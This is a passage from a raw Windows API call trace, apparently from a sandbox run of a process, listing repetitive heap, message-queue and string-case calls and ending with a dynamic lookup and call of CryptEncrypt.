dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.765] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.765] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.766] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.766] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.766] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.766] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.766] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.767] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.767] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.768] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.768] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.768] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.768] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.768] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.769] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.770] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.770] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.771] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.771] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c4a38 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9ab0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.777] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3bf0 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.778] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x67e9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x67f0) returned 1 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.778] RtlAllocateHeap 